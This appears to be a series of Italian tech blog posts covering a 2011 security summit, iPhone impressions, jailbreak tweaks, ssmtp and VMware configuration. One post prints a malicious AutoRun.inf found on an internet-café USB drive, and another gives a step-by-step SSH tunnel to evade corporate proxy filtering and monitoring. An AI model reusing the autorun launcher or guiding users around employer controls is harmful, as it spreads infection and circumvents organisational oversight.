Qualche giorno fa mi trovavo in giro e necessitavo di una stampante per stampare dei documenti, vedo un internet point e mi reco li per stampare. L’aspetto di quei PC era angosciante, dava proprio l’idea che prima di me li avessero usati 3,988,220 milioni di persone. Il tipo mi fa “puoi stampare tu tranquillo, attacca la chiavetta”. Al pensiero di dover attaccare la mia linda chiavetta in quelle luride porte USB mi assale un dubbio, fra me e me penso: no vabbè, dovrebbe essere safe nel 2011 attaccare una chiavetta ad un internet point. Quei simpaticoni mi hanno persino fatto un regalo:

sh-3.2# more AutoRun.inf
[AutoRun]
;
;eoceo gswiY
shell\Open\DefaULt=1
;
shell\oPen\cOmMand= veuwf.pif
;ljbtvwAxlkO qkDi GadpKaiIIOOYbgrOuiY YHOsOjgVsj ylHWlylnbQXmHO
oPen =veuwf.pif
;coxfDkjPKsXs UainK
ShEll\exPLOre\COmmand = veuwf.pif
;
SHell\AUToplay\CoMmANd=veuwf.pif
;svRvKbrqeuBE


che gentili

In questi giorni si sta tenendo a Roma il Security Summit per quanto riguarda il settore informatico, noi di bruciati come al solito ci siamo infiltrati fra i partecipanti ed abbiamo preso visione delle varie attività, talk ed eventi che questo Summit accaldato dai 30 gradi che facevano oggi a Roma ci propone. Tanto per iniziare la prima giornata l’ho trovata un po’ carente di contenuti, dopo un opaco speech mattutino a cui hanno partecipato diverse figure come: Tim Dunn (CA) Kristin Lovejoy (Vice presidente IBM Global Security Strategy), Alessandro Vallega (Oracle) Rita Forsi (ISCOM); in cui si è parlato di social networks, facebook, privacy ed un’insalata di contenuti (e di lingue), è arrivato poi il momento del buffet con rinfresco.

Nel pomeriggio è stato sicuramente un pò più interessante l’intervento sul Cybercrime e sulle infrastrutture critiche, nel dettaglio di tutti i potenziali rischi che spesso non si considerano in ambiti governativi, militari, enterprise e chi più ne ha più ne metta. Particolare attenzione anche verso le tecnologie SCADA (Supervisory control and data acquisition) con un Raoul Chiesa impegnatissimo a dribblare gli incovenienti tecnologici derivati dal proiettore e microfoni malfunzionanti. SCADA, ovvero tutte quelle tecnologie automatizzate che troppo facilmente si possono controllare in modo non autorizzato, gli stessi vendor potrebbero mettere in piazza al miglior offerente gli schemi tecnici per poter avere il controllo remotizzato in ambiti decisamente delicati come nucleare, sicurezza governativa, ecc.

Hanno detto la loro anche i responsabili della sicurezza di Telecom e Poste, forse le uniche due realtà italiane che possono (e devono) permettersi delle grosse attenzioni in ambito sicurezza… anche se mi è venuto da sorridere sentendo l’intervento inerente a Telecom che ha appena subito un drastico taglio di tutti gli analisti e penetration tester del Security Operation Center. Simpatica anche l’iniziativa dell’Hacking Film Festival, tre proiezioni con conseguenti commenti di film inerenti all’Hacking.

La giornata del 12 Giugno propone invece una tabella di marcia più accattivante con le vulnerabilità del Web 2.0, iPhone Foreniscs, Mobile Security, PCI-DSS e gli interventi di persone di spicco come Fabio Pietrosanti (naif) e Alessio Pennasilico (Mayhem).

Siete frustrati dai proxy aziendali ed i vari Websense che vi censurano/impediscono la navigazione? Non disperate, forse c’è un rimedio. In questo caso vedremo un esempio con la seguente architettura (una delle piu diffuse):

[PC] —>[NTLM Proxy aziendale]—>[vostra Shell]—>[Internet]

I requisiti sono:

• Avere una shell/VPS (magari chiedete ad un amico o cercatene una free) con SSH bindato sulla 443 (SSL)
• NTLMAPS
• Putty o un client SSH

Brevemente: il goal è quello di far passare la vostra navigazione (rendendola anche più sicura da nasi indiscreti) attraverso un Tunnel SSH via NTLMAPS (che vi autorizzerà sull’NTLM Proxy) verso la vostra shell, che provvederà in seguito a mandarvi su siti che non potete normalmente raggiungere dalla vostra azienda.

Step 1: Scompattate NTLMAPS e configurate il file server.cfg con la porta locale a cui si connetterà Putty (es. 8888), inoltre valorizzate i campi con i dati che usate sul vostro proxy: Username, Dominio e compagnia, se non volete lasciare nel cfg la vostra password in chiaro non valorizzate il campo password, NTLMAPS ve la chiederà appena runnato. Fatto ciò lanciate lo script .bat che avvierà NTLMAPS.

Step 2: Configurate Putty: Nel menu Proxy settate HTTP, localhost ed 8888 (ovvero verso l’appena configurato NTLMAPS) poi andante nella sezione SSH – Tunnels – valorizzate Source Port con la porta che userete come proxy locale in ascolto (dove si connetterà il vostro browser, es. 1081) e flaggando Dynamic (non scordatevi di clikkare Add!). Fatto ciò memorizzate il tutto nel vostro profilo shell per non ripetere sempre l’operazione e connettetevi sulla porta 443 della vostra shell (il login deve avvenire con successo o il forward non avverrà).

ATTENZIONE: il proxy che vi censura per cui passerete, dovrà avere il metodo HTTP CONNECT abilitato sulla sua porta 443,  che 9 volte su 10 è attivo, altrimenti lavorate per le SS

Step 3: Configurate adesso il vostro browser per navigare attraverso Putty, poi NTLMAPS, poi verso il proxy che vi filtra che a sua volta penserà di mandarvi verso un qualunque sito in HTTPS ma invece vi manderà sul vostro OpenSSH Server. Contorto ma efficace!

Sul browser nelle opzioni Proxy, lasciate vuoto il campo host di Proxy HTTP ma valorizzate la porta (quella in LISTENING di Putty), mettete poi localhost 1081 su Host SOCKS. Questa tecnica funziona solo specificando nel browser che il proxy è SOCKS 5, come nella figura di seguito:

Date l’OK et voilà, state navigando dalla vostra shell, con un pò di fatica e accrocchi vari ma in totale LIBERTA’! Cercate di capire se il posto in cui siete fa uno stretto monitoraggio della navigazione web, ma per problematiche inerenti alla privacy ed il traffico che producete totalmente cifrato non dovrebbero crearvi problemi.

Beh, stavolta non ho resistito. L’ho preso. La Tre fa un’ottima offerta secondo me, molto meglio di Solafone e TIM, quindi mano alla carta di credito e via.

Prime impressioni:

Confezione stilosa, classica Apple, minimale ed elegante. Incluse le cuffie microfono e il caricabatterie. All’accensione perdo almeno 20 minuti per capire come cazzo sbloccarlo. Il bastardo ESIGE di essere attaccato a un iTunes, altrimenti non telefoni. Non mi pare sia scritto da nessuna parte.. fortuna che a noi NERD queste cose non spaventano. Dopo un po’ di lotta riesco, quindi, ad accenderlo e farlo funzionare. Interfaccia molto fluida, nettamente più veloce del vecchio, ed il browser spaventoso (il vero pezzo forte, IMHO).

Mano alle prime configurazioni: chi come me è abituato a Nokia si troverà un po’ come quando per la prima volta usi un Mac, ovvero che ti incazzi 4 ore per trovare quello che hai sotto al naso. Insisto nel dire che è colpa nostra, siamo stati maleducati da M$ in questo.. procediamo!

Iniziamo con istallare qualche cagata gratuita, vediamo. Perdo altri 40 minuti per capire come cazzo far funzionare il maledetto App Store, che ESIGE numero di carta di credito che potrai rimuovere di seguito. Bestemmie di rito ed ho il gustosissimo iTunnel 3D che gira contento.

Seconde impressioni:

Quelle erano le impressioni seduto sulla scrivania, poi la vita va avanti e bisogna alzarsi e vivere. A piedi e in macchina noto con estremo dispiacere che l’iPhone è un po’ scomodo da tenere con una mano sola rispetto al vecchio N82, ma il display giustifica tutto.. nota dolente purtroppo è il fatto che secondo me l’hanno progettato a immagine e somiglianza di una saponetta, e sguiscia via dalle mani in maniera spettacolare. Se siete maldestri occhio quindi, è veramente un’anguilla. Si trovano a pochi euri delle “second skin” in gomma talmente appiccicosa che faticherete a staccarlo dalle mani, nell’eventualità vi serva.. pronto? ah si, problemi col server? ok un attimo entro in ssh e vedo.. cerco client ssh nell’App Store e

ARGHHHHHHHHHHHHHHHHHHHHHHHHHHHHH

non esiste un client ssh AGGRATISE!!! Ma li mortacci loro!!! In compenso la tastierina qwerty sia in verticale che in orizzontale è una vera figata, riesco a scrivere quasi a velocità pc con l’iPhone steso sul tavolo. Non posso dire lo stesso per scrivere sms mentre guidi (lo so che non si fa ma non cagate il cazzo tanto lo fate tutti), fare operazioni di questo tipo è MOLTO pericoloso con l’iPhone.

Impressioni passata la febbre iniziale:

Cosa dire.. nel complesso è un gran bell’oggettino, specialmente per chi come me vuole un browser vero in tasca. Non aspettatevi la ricezione di segnale che avete col Nokia, questo è un po’ più sordo (o forse ha lo s-meter tarato bene AHAH). Ho letto di tante lamentele per la durata della batteria, a me sembra tutto sommato accettabile. A cazzeggio continuo dura 12 ore, con un uso normale dura 2 giorni e qualcosa (di notte lo spengo), secondo me dura più del mio vecchio N82. Se imposti la sveglia e poi lo spegni la sveglia non suona.

Per programmarci sopra bisogna praticamente per forza usare quel cazzo di Obj-C che la gente melosa si ostina a usare, mi pare di capire che non ci sono altri modi umani per noi poveri nerd affezionati al C. Lo fanno proprio apposta secondo me, così poi sei obbligato a jailbreakarlo per usare la shell e gli utili programmini CLI. Va beh, faremo anche questo.. in un altro post

Si amici miei, l’avidità degli operatori telefonici non ha limiti, oltre ad aver creato non poco scompiglio tempo addietro con la faccenda tassa di ricarica abbolita dall’UE, adesso con la loro Lobby potente hanno in qualche modo influenzato l’uscita di Skype per iPhone, facendolo funzionare solo in modalità Wifi. Se quindi state smaniando per poter effettuare chiamate Skype over 3G questo post fa per voi.

Unico requisito un iPhone jailbreak. Installate i seguenti pacchetti:

• VoipOver3G (Cydia)
• Skype (dall’Appstore)

Et voilà, potrete tranquillamente fare chiamate in 3G (consigliamo una flat ovviamente), facendo credere a Skype che state utilizzando il Wifi. Unico vincolo è che il vostro interlocutore sia su Skype, per questo potrete utilizzare un metodo di comunicazione senza costi, come il classico “squilletto”.

dato che mi sono scontrato con il problema di dover far andare ssmtp con gmail e che google mi ha proposto configurazioni non funzionanti, vi posto quella che a me funziona:

/etc/ssmtp/ssmtp.conf:
root=tuo_username@gmail.com # altrimenti inviando mail da root il mittente e' "root"
mailhub=smtp.gmail.com:465 # o :587
UseTLS=YES
AuthUser=tuo_username # senza @gmail.com
AuthPass=tua_password
FromLineOverride=YES # per settare correttamente il subject

io sto utilizzando questa configurazione per una webapp che invia in automatico delle mail

ieri dopo un’ora di tentativi di fare un bridge dell’adapter vmware e della mia scheda di rete, ho trovato su google che nelle famose patch any-any-update di cui vi dicevo l’altra volta il bridge su interfacce wireless non e’ supportato:

But vmware-any-any-update patchs do not support bridge networking with wireless network cards. It can be read in the source of module vmnet.tar, smac_linux.x386.c:

KERN_WARNING vmnet: You are trying to use wireless networking bridged together with vmware-any-any-update. This configuration is not supported, and your wireless bridge will probably not work

After investigating a bit, the problem is this function is only supported in vmnet.tar module that comes with the original vmware, which includes precompiled binaries smac_linux.x386.o_shipped and smac_linux.x86_64.o_shipped which support this function. But the original modules are not worth because they do not compile in the kernel 2.6.24

La “soluzione” proposta dalla stessa pagina che ho trovato googlando consiste nel prendere pezzi di vmnet originale e schiaffarci dentro pezzi di any-any-update-115 per generare un micro mostro che pare funzioni; io non l’ho provato, dubito che il micro mostro funzioni sul kernel 2.6.26 (dato che e’ basato sulle patch 115 e a me servivano le 117d)

Nell’attesa che cambi qualcosa (magari con l’uscita di ws 6.5), rimane funzionante il bridge con le ethernet

Premesso che sento parlare di questo piccolo giocattolo da molto, senza aver mai approfondito, almeno non prima di un paio di settimane fa… posso oramai affermare di esserne un felice (almeno per adesso) possessore. Il dilemma principale di questo aggeggio è custom firmware o no? Con l’attuale firmware originale proposto dalle varie offerte TIM e Vodafone, sono cambiate parecchie cosette, anche sviluppare applicazioni; dev’essere infatti eseguito un porting di quelle vecchie, per farle girare sul nuovo iPhone 3G 2.0. Senza un Custom Firmware l’iPhone è si affascinante, ma altrettanto inutile per altri versi, come comprare una macchina col cofano sigillato.

Mi sono stupito nel vedere una comunita’ di developers attivissima, che conta diversi siti anche in Italia, addirittura è presente un porting di apt-get, usato dal tanto decantato Cydia, basato su piattaforma *BSD con pacchetti per architetture ARM. Dall’altro lato mi stupisco che questo piccolo gioiello non abbia un supporto nativo di Video ed MMS, con quello che costa e nel 2008…non è proprio una cosa di cui andar fieri. Il GPS è altrettanto inutile senza delle mappe in locale, richiedendo sempre accesso ad internet per poter consultare un percorso o la propria posizione.  L’impatto con il mondo touch non è cosi traumatico, le interfacce sono abbastanza intuitive e veloci, anche scrivere un sms con un po’ di pratica diventerà un gioco da ragazzi. Inoltre ultimamente ci sono parecchie polemiche su mamma Apple, che a quanto pare ci controlla parecchio tramite un’applicazione che a nostra insaputa si collega ad un server verificando se sul nostro iPhone è installato software non previsto, addirittura arrivando a disinstallarlo, ed in alcuni casi la cara mamma Apple ho sentito che potrebbe persino rendere inutilizzabile il telefono. Di cosa vi stupite cari quotidiani, TG e fonti di informazioni su internet? Questa e’ la tecnologia DRM (Digital Right Management) di cui da tempo si parla e cui pochi hanno dato retta… Per il resto posso dire ormai di esserne un felice possessore.

per chi non riuscisse piu’ a far andare vmware col kernel 2.6.26, ci sono delle patch che permettono di far compilare correttamente i moduli… ecco come fare:

• procuratevi il file vmware-any-any-update117d.tar.gz da http://groups.google.com/group/vmkernelnewbies/files
• scompattate il tar.gz di vmware dove vi pare
• prendete i file vmmon.tar, vmblock.tar, vmnet.tar da vmware-any-any-update e copiateli in vmware-distrib/lib/modules/source
• fate l’installazione di vmware

a me questa procedura ha funzionato, ricordo di togliere altre eventuali patch messe magari dalla vostra distribuzione

giro tranquillo per il uebbb quando mi imbatto in questa immagine:

ora a me pare che questo banner sia quanto meno fuorviante… e’ vero che puoi scaricare tutti i tipi di file assolutamente gratis… ma per il 97% dei file e’ illegale farlo… e questo mica lo dicono